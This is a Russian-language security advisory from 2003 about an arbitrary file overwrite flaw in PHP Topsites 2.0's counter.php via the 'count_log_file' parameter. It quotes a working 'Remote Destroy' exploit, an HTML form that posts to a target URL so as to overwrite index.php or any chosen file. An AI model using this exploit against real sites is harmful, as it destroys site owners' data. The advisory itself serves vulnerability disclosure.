Изменение произвольных файлов в PHP Topsites
| Дата публикации: | 27.03.2003 |
| Всего просмотров: | 1231 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в PHP Topsites. Удаленный пользователь может изменять произвольные файлы на сервере.
Удаленный пользователь может, по сообщениям, представить произвольное имя файла для переменной 'count_log_file', чтобы заставить сценарий counter.php перезаписать произвольный файл. Эксплоит: <HTML> <HEAD> <TITLE>PHP Topsites 2.0 Remote Destroy Exploit. Found By Skull Hacker</TITLE> </HEAD> <BODY> <P><B><FONT FACE="Arial">PHP Topsites 2.0 Remote Destroy Exploit - Discovered By Skull Hacker <FONT SIZE="1"> <A HREF="mailto:skull_hacker@hackersof2000.net"> skull_hacker@hackersof2000.net</A> .<BR> <BR> </FONT><FONT SIZE="2">Click destroy and the Topsites will then be fully erased and replaced with numbers. Enjoy ! note: Change the count_log_file=index.php too any file u want too overwrite on the server.<BR> </FONT></FONT></B></P> <FORM METHOD="POST" ACTION="http://www.sitetoohack.com/counter.php?count_log_file=index.php"> <INPUT TYPE="submit" VALUE="Destroy" NAME="B1"></P> </FORM> </BODY> </HTML>Уязвимость обнаружена в PHP Topsites 2.0 |
| Ссылки: | PHP TopSites 2.0 Remote Destroy Exploit |